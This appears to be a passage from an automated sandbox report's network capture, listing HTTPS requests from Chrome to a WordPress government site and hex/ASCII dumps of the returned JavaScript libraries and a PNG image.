                                                                                                                        2025-01-10 13:54:48 UTC8168INData Raw: 5b 66 5d 3b 69 66 28 68 29 7b 63 3d 45 28 78 28 63 2e 41 61 2c 54 71 29 2c 68 29 3b 68 3d 7b 7d 3b 76 61 72 20 6b 3d 7b 7d 2c 6c 3d 28 6b 5b 64 5d 3d 65 3f 28 68 5b 65 5d 3d 0a 63 2c 68 29 3a 63 2c 6b 29 3b 63 3d 6c 61 28 67 29 3b 65 26 26 31 3c 63 2e 6c 65 6e 67 74 68 26 26 28 6c 5b 64 5d 2e 61 63 74 69 6f 6e 46 69 65 6c 64 3d 4a 62 28 66 75 6e 63 74 69 6f 6e 28 6d 2c 70 29 7b 69 66 28 70 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6d 3b 69 66 28 22 63 75 72 72 65 6e 63 79 22 3d 3d 3d 70 29 72 65 74 75 72 6e 20 6c 2e 63 75 72 72 65 6e 63 79 43 6f 64 65 3d 67 2e 63 75 72 72 65 6e 63 79 2c 6d 3b 6d 5b 55 71 5b 70 5d 7c 7c 48 67 5b 70 5d 7c 7c 70 5d 3d 67 5b 70 5d 3b 72 65 74 75 72 6e 20 6d 7d 2c 7b 7d 2c 63 29 29 3b 72 65 74 75 72 6e 20 6c 7d 7d 7d 66 75 6e 63 74
                                                                                                                        Data Ascii: [f];if(h){c=E(x(c.Aa,Tq),h);h={};var k={},l=(k[d]=e?(h[e]=c,h):c,k);c=la(g);e&&1<c.length&&(l[d].actionField=Jb(function(m,p){if(p===f)return m;if("currency"===p)return l.currencyCode=g.currency,m;m[Uq[p]||Hg[p]||p]=g[p];return m},{},c));return l}}}funct


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        35192.168.2.74982269.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC636OUTGET /wp-content/themes/betheme/js/plugins/debouncedresize.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:48 UTC366INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "1d8-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 472
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:48 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:48 UTC472INData Raw: 2f 2a 2a 0a 20 2a 20 52 65 73 69 7a 65 0a 20 2a 20 64 65 62 6f 75 6e 63 65 64 72 65 73 69 7a 65 0a 20 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6c 6f 75 69 73 72 65 6d 69 2f 6a 71 75 65 72 79 2d 73 6d 61 72 74 72 65 73 69 7a 65 20 7c 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 65 76 65 6e 74 2c 6e 2c 72 3b 6e 3d 74 2e 73 70 65 63 69 61 6c 2e 64 65 62 6f 75 6e 63 65 64 72 65 73 69 7a 65 3d 7b 73 65 74 75 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 28 74 68 69 73 29 2e 6f 6e 28 22 72 65 73 69 7a 65 22 2c 6e 2e 68 61 6e 64 6c 65 72 29 7d 2c 74 65 61 72 64 6f 77 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 65 28 74 68
                                                                                                                        Data Ascii: /** * Resize * debouncedresize * https://github.com/louisremi/jquery-smartresize | Licensed under the MIT license. */(function(e){var t=e.event,n,r;n=t.special.debouncedresize={setup:function(){e(this).on("resize",n.handler)},teardown:function(){e(th


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        36192.168.2.74982769.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC437OUTGET /wp-content/uploads/2024/02/home-page-image.png HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:48 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Mon, 05 Feb 2024 10:22:21 GMT
                                                                                                                        ETag: "275ba9-6109fd64e3a6a"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 2579369
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:48 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: image/png
                                                                                                                        2025-01-10 13:54:48 UTC7825INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 00 00 00 04 80 08 02 00 00 00 b6 a3 11 cd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0b 50 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 36 30 2c 20 32 30 32 30 2f 30 35 2f 31 32 2d 31 36 3a 30 34 3a 31 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                        Data Ascii: PNGIHDRpHYsPiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RD
                                                                                                                        2025-01-10 13:54:48 UTC8000INData Raw: 5d 03 00 20 44 d6 5a bd b8 88 f6 79 53 7b 9d 21 a2 19 5e 6e 83 e6 a2 7c 70 ac 79 c9 1a 5e c5 8d 1d 7b 7b 7d 7e 97 2f e8 f5 6d 5b f5 42 75 93 b8 5d 68 34 9e e7 51 7a 59 75 c1 f3 7c 00 80 2b b2 ee 7c 6d 5c 7a 20 97 77 d9 4d 43 ee bf 42 4a 17 f1 ed f6 ef 8a 74 81 85 43 10 84 d0 79 ec 12 8c 11 84 c6 68 b3 a8 37 ef d2 02 42 08 95 92 ce 1f c7 b5 7f 19 25 ed 76 a8 17 ab 1c 2e de cc 7d 0a 21 c4 18 c9 85 00 e4 ce 1a 40 58 96 95 d6 da 0f 82 a2 28 5c 30 35 00 60 32 19 3f 7e fc 78 73 73 f3 af ff fa af e2 d0 2f 8a 32 cf 73 17 9c 6e ad 15 42 00 00 96 75 2a 1a 1a 5e 87 db 1e 61 1a 5e 8a 1b 05 5e f5 6f cd 9d 37 17 f4 e7 c7 5d be a6 8d 07 50 c3 07 8c 5d d4 8e 5d d4 d1 20 9c b3 45 7c 16 76 1a 07 e7 7c 3e 9f 97 65 e9 79 5e b7 d3 01 00 8c c7 63 00 40 b7 db f5 7d 5f 4a 81 09
                                                                                                                        Data Ascii: ] DZyS{!^n|py^{{}~/m[Bu]h4QzYu|+|m\z wMCBJtCyh7B%v.}!@X(\05`2?~xss/2snBu*^a^^o7]P]] E|v|>ey^c@}_J
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: ad f7 b8 8a 5a 1b 1b 1b ed 56 ab 28 cb d9 6c a6 95 72 2e 4e 75 5d bb 75 05 e0 ca bd 1b e3 ba 45 49 09 00 40 08 55 55 25 a5 6c b5 5a d6 da c9 74 6a 8c e9 f5 7b 4e 24 32 da 68 a3 b5 d6 e7 c3 e1 f9 f9 39 25 64 63 73 33 cb 32 4a e9 65 bf a5 29 25 84 60 ec e6 35 8c b0 e0 5c 69 ed d2 39 57 55 e5 7a a9 2c 4b 17 f4 5d 55 d5 7c 3e 87 08 7d f9 ab 2f 3f 79 f8 d0 95 b0 70 15 15 16 d9 f7 5c 47 5d f1 d0 35 76 25 7c fb bd dc 48 0d 0d 0d 0d 0d 1f 21 1f b0 00 04 d7 ce 03 dd e4 90 7e c7 ac 2e 76 5d b1 59 97 8b 87 ee 4f 29 95 10 ae 10 18 af 19 ab eb ba 28 8a 30 0c fb fd 9e ab 3b ee fb 41 bf df 1f f4 fb 41 e0 65 59 fe c3 0f 4f c6 e3 c9 d6 d6 d6 e7 9f 7f 81 31 ce f2 1c 00 a0 b5 ce b2 ac dd 6e 75 3a 9d ef be fb 2e cb 0b e7 ad e3 56 35 5d d6 9b 28 8e 19 63 b3 e9 74 36 9b 79 94
                                                                                                                        Data Ascii: ZV(lr.Nu]uEI@UU%lZtj{N$2h9%dcs32Je)%`5\i9WUz,K]U|>}/?yp\G]5v%|H!~.v]YO)(0;AAeYO1nu:.V5](ct6y
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: bf fc f1 8f df 7c f3 97 7f fd af ff 75 14 45 55 55 8d 46 17 dd 4e 27 8a e3 fb f7 ef a7 69 3a 9d 4e 07 83 c1 78 3c 0a 82 e0 60 6f 37 2f f2 aa aa ea 9a 0d cf 2f 76 b6 76 81 b5 69 9a 02 00 c3 30 2c f2 ca 1a 8b 10 82 18 42 08 09 41 6e 15 c4 5a 60 a0 41 f0 32 86 c3 d5 08 73 b3 5e 10 04 3b 3b 3b 9b 9b 9b d3 d9 ec f0 d9 d1 70 78 71 78 78 c8 58 95 24 2d c6 b9 31 d6 02 63 81 e9 f7 fa bd 76 e7 e4 d9 71 7a 96 ba c5 92 d9 6c d6 ed 76 3d cf 3b 7c 7a b8 7f b0 bf 31 d8 38 61 27 df 7c f3 cd 6f 7e fb 1b 60 81 10 c2 5a 1b 04 c1 fd fb f7 8f 8f 8f ff eb 7f fb 6f ff fb ff eb ff dd 6a b5 6a 56 cf e7 73 df f7 f7 f7 f7 4f 4f 4f 9f 3d 7b 16 86 e1 60 30 f8 fe fb ef 7f f7 bb df fd f6 b7 bf fd c7 7f fc c7 7e bf ef d6 36 76 a4 80 10 12 84 0d 25 61 18 84 61 38 1a 8d 8e 8e 8e 18 63 f7
                                                                                                                        Data Ascii: |uEUUFN'i:Nx<`o7//vvi0,BAnZ`A2s^;;;pxqxxX$-1cvqzlv=;|z18a'|o~`ZojjVsOOO={`0~6v%aa8c
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 69 f5 07 1d 25 55 51 14 4c a8 3c 2d 05 53 13 31 85 10 f7 7a 03 4a bd 1f 7e 78 52 16 65 ab dd ee 0d fa 93 c9 b4 aa eb a2 2c ff e5 4f 7f fc fc cb 5f 76 07 3d 42 a9 d2 7a 96 ce 93 24 31 c0 0a ad 99 e0 da 1a 65 b4 b1 d6 b8 fa 5d 18 13 42 62 2f d8 3b 38 60 8c 7d fb dd b7 d6 9a 5f 3c fa c5 fd fb f7 bb dd 1e 04 56 08 91 c4 b1 16 52 18 03 11 24 84 62 84 2c 00 c6 18 63 8d 54 d2 58 bb a6 f1 77 ab bc f8 94 7b f9 62 91 05 e8 c5 a6 3b 13 ff c5 6d 5f 64 cd 25 89 f5 7b ed 32 5d fa 0b 0f a2 6b ef b8 e1 6e e1 2e ab 59 70 e5 2a 5f 7f bb da 45 cc a3 0b ec 5a 55 8e 96 3b 07 8b 5b 68 35 3a 6c b9 95 f3 21 52 4a 5d f3 8b 58 75 50 ff b9 3d 1b bf 9a 65 8c 30 58 84 ce 2d 7d 24 8d 31 08 1b 70 19 70 a7 95 32 18 23 4a 31 e3 55 9a a6 93 c9 c4 f3 3d 00 40 9a ce 8d 31 65 59 24 ad c4 f7
                                                                                                                        Data Ascii: i%UQL<-S1zJ~xRe,O_v=Bz$1e]Bb/;8`}_<VR$b,cTXw{b;m_d%{2]kn.Yp*_EZU;[h5:l!RJ]XuP=e0X-}$1pp2#J1U=@1eY$
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 69 96 ce 66 73 c6 58 10 04 db db 5b ab ab bd 30 0a c2 20 68 36 9b 87 87 87 a3 d1 a0 2c cb d1 68 e4 ba 0e c6 84 10 02 20 04 8c 4a 5e 49 00 24 87 52 30 ce 45 9e 13 84 80 52 02 42 c5 79 65 d9 a4 2c cb 38 59 b4 ba ed c8 0f 8b 32 03 50 52 c6 92 3c 8d f3 98 94 d8 b6 4d cf f3 f7 0f 86 93 e9 c4 32 cd a2 cc 7e f7 f1 ff 62 8c ad ac ac dc b8 71 e3 d2 ce ce d6 e6 86 69 5e 1e 8d 46 b7 6f df 7e f8 f0 e1 64 34 da 7f fa d4 f5 7d c3 20 84 18 59 9e 73 ce 7b b8 2b 84 62 82 5a 8e 85 09 a6 ac 56 ca 96 40 42 8c a0 52 10 ca 9a 52 ca a5 50 50 02 04 91 41 19 83 82 99 96 e5 f9 5e 9a a5 a7 38 b8 69 ce 17 0b ce b9 eb ba 94 52 ce 85 ae 6a dd 2f b4 9c 9c 71 a6 13 c6 33 c1 b9 60 35 ab ca b8 2c ab d2 76 2c cf 77 fb fd de c1 fe 91 65 59 b7 6e dd 3a d8 df 5f 2c 16 00 a8 22 cf 2d d3 6c b7
                                                                                                                        Data Ascii: ifsX[0 h6,h J^I$R0ERBye,8Y2PR<M2~bqi^Fo~d4} Ys{+bZV@BRRPPA^8iRj/q3`5,v,weYn:_,"-l
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 00 82 90 18 86 a1 39 50 cb f1 16 42 28 a5 d4 2e 57 86 61 18 c4 e0 82 eb c3 86 25 7e ba 24 5e 61 8c 39 17 8a b3 28 8c b2 3c 47 10 96 65 f9 f1 c7 1f 57 55 f5 d6 9b 6f 47 8d 68 77 77 77 7b 6b 6b 6b 73 0b 28 90 c6 e9 78 3c ce b2 cc f7 fd 28 8a de b8 79 e3 ca e5 cb 61 18 42 00 a5 92 3a 1d 24 17 bc 2c cb d1 68 a4 a7 03 62 18 08 42 8d fb e8 43 02 43 bb af 9b e6 a9 21 34 c4 3f d9 bd e5 2b c6 72 ca 50 67 ff 6a 66 16 00 00 40 08 10 50 54 f0 3c 4f fd 20 b0 1d b3 ae 69 9c 2c 5c d7 31 4d 9d f5 55 fc 30 a5 be 88 8b b8 88 8b f8 11 c7 05 00 74 11 3f a5 58 6e c8 cf af 86 97 b6 2c 4b d3 84 a5 ff c5 72 2f 0a 00 d0 10 8c 02 80 73 4e 41 55 61 d3 b4 ac 4e bb 1d f8 de ce d6 e6 78 34 9d 4e 67 97 2e ed 08 29 47 a3 d1 d1 d1 d1 7c be d0 27 e7 84 10 c3 b2 1c d7 d5 f2 72 2d 31 03 00
                                                                                                                        Data Ascii: 9PB(.Wa%~$^a9(<GeWUoGhwww{kkks(x<(yaB:$,hbBCC!4?+rPgjf@PT<O i,\1MU0t?Xn,Kr/sNAUaNx4Ng.)G|'r-1
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 82 11 c2 24 2d 8a b2 2c c3 30 74 5d 5f 49 a8 a4 d6 6f c9 22 cf b3 24 b3 ed c0 b2 2c cc 31 13 82 71 6a 98 a6 e7 79 00 80 b2 ac ea ba ce 8b d2 20 18 00 09 90 52 40 69 8b 6a cc 39 41 64 59 03 e7 0f ee ce 4e e1 f4 79 26 80 10 d5 75 3d 1a 0d ab aa ae eb cc 73 7d 42 0c c6 58 4d 69 51 14 0a 80 56 bb 9d 24 49 9a 26 9c 73 21 c4 d2 eb d7 30 0c 62 18 52 08 29 04 3a dd aa 81 e5 4a 5a 1b 15 17 65 c1 85 e8 f5 7a bb 8f 77 8f 4f 4e 8e 0e 0f 11 44 3b 3b 3b 1f 7e f4 d1 f5 ab d7 21 44 f7 f6 f7 4e c6 43 d3 30 74 42 99 38 49 d6 57 57 fb 2b 2b 81 ef eb 2b 21 08 5d d7 d5 7c 19 4a a9 65 59 41 e0 db b6 43 69 ad 9d 9b 5f a5 b5 a8 33 4f 65 cb b2 30 26 75 5d 53 ed 94 64 98 86 61 d6 ac d6 38 97 d6 ad 30 ce 8f 8f 8f ab ba ea af ac 08 00 66 f3 79 9a 24 b6 65 75 bb dd f1 78 7c 78 78 a8
                                                                                                                        Data Ascii: $-,0t]_Io"$,1qjy R@ij9AdYNy&u=s}BXMiQV$I&s!0bR):JZezwOND;;;~!DNC0tB8IWW+++!]|JeYACi_3Oe0&u]Sda80fy$eux|xx
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 4a 2a 3d fb 83 d3 a3 28 a5 5b 38 80 08 61 84 11 00 80 52 9a 17 45 9a a6 65 51 0a ce 35 43 59 af 18 00 50 e0 74 69 c1 04 67 42 30 29 38 50 92 10 6c 98 c4 b0 61 1c 4f 8b 22 b5 4c 0c a0 5c cc 46 d3 c9 28 5e 2c c6 93 e1 e1 c1 fe c9 f1 d1 74 32 4e d3 54 09 ce 39 b3 6d bb d9 6c 4a 29 1a 8d 86 6d d9 42 4a 83 58 67 8e 87 e8 fc f2 e0 1b 09 e3 7f de b8 00 80 be 2d 7e 4c 00 10 fc 0f fe ff e2 f8 61 01 a0 ef fd d0 d4 05 00 f4 7d e3 27 0c 00 bd de 34 f0 2f 91 60 00 a0 5e 5c f8 17 be fb 0d 2b a6 af dd 7d d9 e6 96 83 fe 57 6f a1 17 b7 f5 17 5e fa 3b 7c b5 97 7d fe a5 7f f1 3d 6f 0d fe 1c 30 ca eb fb f8 ab c4 f7 f8 e2 e7 17 52 5c 62 a5 14 04 02 42 84 96 2d 41 2a c1 85 52 2a 5b e4 d3 d9 d4 f7 fd 28 8a 1a 51 63 67 73 b3 15 45 83 e1 e0 f0 f0 70 f7 c1 bd 27 8f ee 6f 6e 6d 76
                                                                                                                        Data Ascii: J*=([8aREeQ5CYPtigB0)8PlaO"L\F(^,t2NT9mlJ)mBJXg-~La}'4/`^\+}Wo^;|}=o0R\bB-A*R*[(QcgsEp'onmv
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 3f f8 e0 c3 f7 de a9 d5 aa 08 f3 d1 64 bc b7 bf b3 0c 02 cb b2 0c 53 cf d2 34 0c 83 34 4b 82 60 99 24 11 a5 a5 90 02 42 e1 fb 1e 21 98 73 56 96 65 ad 5a b5 2c ab 2c cb 2c cb 74 dd 50 4d 5a 96 67 9a a1 35 bd 2a a5 dc b2 2c 84 90 a1 9b b5 5a cd f3 7d 08 51 bb dd 36 4d 9d 73 c9 39 10 02 43 08 a3 28 3a 3d 3d 5d 2e 97 86 61 58 e7 99 89 8a 11 cc 38 27 e7 1d c2 45 bd 3e ba f8 95 1e f5 cb ba ac df 81 fa a5 0b d4 e5 73 f4 1b 58 f8 bf fc 1b 96 80 fd 23 0c d9 2f 25 60 bf 45 f5 2b 7e 2e 15 13 2e cf 95 29 17 94 04 f5 45 59 96 6a 08 66 db b6 ea 27 ca b2 2c 8a a2 2c 4b 65 c3 a1 a4 61 51 14 e5 79 ae b6 e2 ed 76 1b 22 34 1e 8f fb 27 fd 24 cb 2a 15 df af f8 69 9a 8e 86 a3 c9 74 42 19 35 0c c3 f5 5c d7 f3 4f 47 c3 97 cf 9f 3a b6 79 e3 da f5 5a a5 ba 5c 04 e1 32 b0 0c 43 4a
                                                                                                                        Data Ascii: ?dS44K`$B!sVeZ,,,tPMZg5*,Z}Q6Ms9C(:==].aX8'E>sX#/%`E+~..)EYjf',,KeaQyv"4'$*itB5\OG:yZ\2CJ


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        37192.168.2.74982569.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC634OUTGET /wp-content/themes/betheme/js/plugins/magnificpopup.min.js?ver=27.0.7 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:48 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Wed, 10 Jan 2024 08:49:53 GMT
                                                                                                                        ETag: "4f10-60e9383bf0b9e"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 20240
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:48 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:48 UTC7823INData Raw: 2f 2a 2a 0a 20 2a 20 4d 61 67 6e 69 66 69 63 20 50 6f 70 75 70 0a 20 2a 20 31 2e 31 2e 30 20 7c 20 44 6d 69 74 72 79 20 53 65 6d 65 6e 6f 76 20 7c 20 4d 49 54 20 7c 20 68 74 74 70 3a 2f 2f 64 69 6d 73 65 6d 65 6e 6f 76 2e 63 6f 6d 2f 70 6c 75 67 69 6e 73 2f 6d 61 67 6e 69 66 69 63 2d 70 6f 70 75 70 2f 0a 20 2a 2f 0a 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 79 70 65 6f 66 20 64 65 66 69 6e 65 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 61 29 3a 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3d 3d 22 6f 62 6a 65 63 74 22 3f 61 28 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 29 3a 61 28 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 7c 7c 77 69 6e 64 6f 77 2e 5a 65 70 74 6f 29 7d
                                                                                                                        Data Ascii: /** * Magnific Popup * 1.1.0 | Dmitry Semenov | MIT | http://dimsemenov.com/plugins/magnific-popup/ */(function(a){typeof define=="function"&&define.amd?define(["jquery"],a):typeof exports=="object"?a(require("jquery")):a(window.jQuery||window.Zepto)}
                                                                                                                        2025-01-10 13:54:49 UTC8000INData Raw: 6f 6e 28 61 29 7b 6e 2e 62 67 4f 76 65 72 6c 61 79 2e 61 64 64 43 6c 61 73 73 28 61 29 2c 6e 2e 77 72 61 70 2e 61 64 64 43 6c 61 73 73 28 61 29 7d 2c 5f 72 65 6d 6f 76 65 43 6c 61 73 73 46 72 6f 6d 4d 46 50 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 62 67 4f 76 65 72 6c 61 79 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 61 29 2c 6e 2e 77 72 61 70 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 61 29 7d 2c 5f 68 61 73 53 63 72 6f 6c 6c 42 61 72 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 28 6e 2e 69 73 49 45 37 3f 73 2e 68 65 69 67 68 74 28 29 3a 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 48 65 69 67 68 74 29 3e 28 61 7c 7c 72 2e 68 65 69 67 68 74 28 29 29 7d 2c 5f 73 65 74 46 6f 63 75 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 28 6e
                                                                                                                        Data Ascii: on(a){n.bgOverlay.addClass(a),n.wrap.addClass(a)},_removeClassFromMFP:function(a){this.bgOverlay.removeClass(a),n.wrap.removeClass(a)},_hasScrollBar:function(a){return(n.isIE7?s.height():document.body.scrollHeight)>(a||r.height())},_setFocus:function(){(n
                                                                                                                        2025-01-10 13:54:49 UTC4417INData Raw: 67 65 22 7d 2c 5f 67 65 74 49 74 65 6d 54 6f 5a 6f 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 2e 63 75 72 72 49 74 65 6d 2e 68 61 73 53 69 7a 65 3f 6e 2e 63 75 72 72 49 74 65 6d 2e 69 6d 67 3a 21 31 7d 2c 5f 67 65 74 4f 66 66 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 76 61 72 20 63 3b 62 3f 63 3d 6e 2e 63 75 72 72 49 74 65 6d 2e 69 6d 67 3a 63 3d 6e 2e 73 74 2e 7a 6f 6f 6d 2e 6f 70 65 6e 65 72 28 6e 2e 63 75 72 72 49 74 65 6d 2e 65 6c 7c 7c 6e 2e 63 75 72 72 49 74 65 6d 29 3b 76 61 72 20 64 3d 63 2e 6f 66 66 73 65 74 28 29 2c 65 3d 70 61 72 73 65 49 6e 74 28 63 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 74 6f 70 22 29 2c 31 30 29 2c 66 3d 70 61 72 73 65 49 6e 74 28 63 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d
                                                                                                                        Data Ascii: ge"},_getItemToZoom:function(){return n.currItem.hasSize?n.currItem.img:!1},_getOffset:function(b){var c;b?c=n.currItem.img:c=n.st.zoom.opener(n.currItem.el||n.currItem);var d=c.offset(),e=parseInt(c.css("padding-top"),10),f=parseInt(c.css("padding-bottom


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        38192.168.2.74982669.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:48 UTC447OUTGET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: none
                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
                                                                                                                        2025-01-10 13:54:48 UTC368INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:48 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Tue, 02 Apr 2024 20:43:58 GMT
